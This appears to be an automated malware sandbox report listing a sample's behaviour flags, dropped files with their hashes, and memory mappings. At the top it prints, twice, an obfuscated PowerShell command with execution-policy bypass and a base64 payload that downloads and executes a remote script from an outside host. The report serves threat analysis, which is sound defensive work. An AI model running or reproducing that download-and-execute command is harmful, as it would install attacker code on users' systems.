C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES63B2.tmpMD5
b94dbc7fc42030c383cd5e85235df22c
SHA1edfeb52fc61d5c89c7823ab13197d54f6540af5b
SHA256b608e81dd78246c1a0e6c75a4c2fe012463c24e475c36c112ec585d45f782e9e
SHA51227715771c4dc60715b96f67be28d269fa3242a84501c5c2fec0ca034181a86f08ca1235f3a3b3ea5a9a22b565b59e949c3be5810a8347965f9f9f9015491d255
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.dllMD5
7e3b26b4e548b718ac01a4a813b7bbec
SHA14baa37135516e271433ebf733f1bb88653ae8677
SHA256667b9ac53a020cdfa105ef9a8f816221696a98d3a353c276ba02d35942e7829d
SHA512e56602f602bee78cfb3675755dc4db3f191b7944ad467d358f8c942762c8f0a05f5287795c30271fb78977bb117db7a59468f323d9ed9741c01d55c1dfa74200
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\c:\Users\Admin\AppData\Local\Temp\yhohqbpl\CSC29A543AFC00E4EA59E5227AB87A5CD7.TMPMD5
870893bd2875d881b5c35c83d5c54938
SHA17423aa725edbe59686aebcc032f4f0e797b2b2c4
SHA25660902d9a170fb53d2c0113a4b4d9784542ece5e90c1f6c11aa30734c7a5e0749
SHA512c0a6e2d8232b5a567dbc9ce152943656484867357836ae199e4a9ff74b8b5c3430389c9c15c29c1f6944bda738dfb182320d46c051b244ab79c67d126abced39
-
\??\c:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.cmdlineMD5
ec18c212f2cc954258b70bc21d1678eb
SHA1232c273f68e5a8cc019b48a89b9e9281b18ad4a7
SHA256682232b6bcc5beeea301620c7e76708a25b02eed5b82e3cbba9c038e2b90a34e
SHA512a75d4552063755e39aeb1bd1b6b56f44d638c8197bf4a21149f72e9e87a40a899919915d7a3ebafc256f6f6e374ccef2431d4716b18882add9c98cb9c5be27a1
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/272-40-0x0000000000000000-mapping.dmp
-
memory/340-46-0x0000000000000000-mapping.dmp
-
memory/528-54-0x0000000000000000-mapping.dmp
-
memory/572-68-0x0000000000000000-mapping.dmp
-
memory/572-53-0x0000000000000000-mapping.dmp
-
memory/640-81-0x0000000000000000-mapping.dmp
-
memory/704-61-0x0000000000000000-mapping.dmp
-
memory/792-86-0x0000000019450000-0x0000000019451000-memory.dmpFilesize
4KB
-
memory/792-111-0x000000001ACA0000-0x000000001ACA1000-memory.dmpFilesize
4KB
-
memory/792-93-0x00000000010E0000-0x00000000010E1000-memory.dmpFilesize
4KB
-
memory/792-110-0x0000000019490000-0x0000000019491000-memory.dmpFilesize
4KB
-
memory/792-76-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmpFilesize
9.9MB
-
memory/792-75-0x0000000000000000-mapping.dmp
-
memory/792-94-0x0000000000F90000-0x0000000000F91000-memory.dmpFilesize
4KB
-
memory/792-102-0x0000000001210000-0x0000000001211000-memory.dmpFilesize
4KB
-
memory/792-92-0x0000000000F80000-0x0000000000F81000-memory.dmpFilesize
4KB
-
memory/792-91-0x0000000000B70000-0x0000000000B71000-memory.dmpFilesize
4KB
-
memory/792-103-0x000000001A1B0000-0x000000001A1B1000-memory.dmpFilesize
4KB
-
memory/792-95-0x0000000001100000-0x0000000001101000-memory.dmpFilesize
4KB
-
memory/992-57-0x0000000000000000-mapping.dmp
-
memory/1048-71-0x0000000000000000-mapping.dmp
-
memory/1080-55-0x0000000000000000-mapping.dmp
-
memory/1088-49-0x0000000000000000-mapping.dmp
-
memory/1152-41-0x0000000000000000-mapping.dmp
-
memory/1184-72-0x0000000000000000-mapping.dmp
-
memory/1184-62-0x0000000000000000-mapping.dmp
-
memory/1188-73-0x0000000000000000-mapping.dmp
-
memory/1188-42-0x0000000000000000-mapping.dmp
-
memory/1204-38-0x0000000000000000-mapping.dmp
-
memory/1288-56-0x0000000000000000-mapping.dmp
-
memory/1300-70-0x0000000000000000-mapping.dmp
-
memory/1300-36-0x0000000000000000-mapping.dmp
-
memory/1520-48-0x0000000000000000-mapping.dmp
-
memory/1576-82-0x0000000000000000-mapping.dmp
-
memory/1580-39-0x0000000000000000-mapping.dmp
-
memory/1596-45-0x0000000000000000-mapping.dmp
-
memory/1636-52-0x0000000000000000-mapping.dmp
-
memory/1644-47-0x0000000000000000-mapping.dmp
-
memory/1660-10-0x0000000000000000-mapping.dmp
-
memory/1672-51-0x0000000000000000-mapping.dmp
-
memory/1676-66-0x0000000000000000-mapping.dmp
-
memory/1684-50-0x0000000000000000-mapping.dmp
-
memory/1700-2-0x0000000000000000-mapping.dmp
-
memory/1700-35-0x000000001C280000-0x000000001C281000-memory.dmpFilesize
4KB
-
memory/1700-9-0x000000001B690000-0x000000001B691000-memory.dmpFilesize
4KB
-
memory/1700-3-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmpFilesize
9.9MB
-
memory/1700-4-0x0000000002280000-0x0000000002281000-memory.dmpFilesize
4KB
-
memory/1700-5-0x000000001AC20000-0x000000001AC21000-memory.dmpFilesize
4KB
-
memory/1700-7-0x0000000002480000-0x0000000002481000-memory.dmpFilesize
4KB
-
memory/1700-17-0x0000000001F20000-0x0000000001F21000-memory.dmpFilesize
4KB
-
memory/1700-18-0x0000000002550000-0x0000000002551000-memory.dmpFilesize
4KB
-
memory/1700-21-0x000000001B4D0000-0x000000001B4D1000-memory.dmpFilesize
4KB
-
memory/1700-6-0x0000000002340000-0x0000000002341000-memory.dmpFilesize
4KB
-
memory/1700-34-0x000000001A6B0000-0x000000001A6B1000-memory.dmpFilesize
4KB
-
memory/1700-33-0x0000000002620000-0x0000000002621000-memory.dmpFilesize
4KB
-
memory/1720-43-0x0000000000000000-mapping.dmp
-
memory/1736-64-0x0000000000000000-mapping.dmp
-
memory/1740-65-0x0000000000000000-mapping.dmp
-
memory/1740-44-0x0000000000000000-mapping.dmp
-
memory/1844-13-0x0000000000000000-mapping.dmp
-
memory/1844-69-0x0000000000000000-mapping.dmp
-
memory/1868-63-0x0000000000000000-mapping.dmp
-
memory/1916-60-0x0000000000000000-mapping.dmp
-
memory/1960-0-0x00000000010C0000-0x00000000013FD000-memory.dmpFilesize
3.2MB
-
memory/1960-1-0x0000000001400000-0x0000000001411000-memory.dmpFilesize
68KB
-
memory/2040-74-0x0000000000000000-mapping.dmp
-
memory/2040-67-0x0000000000000000-mapping.dmp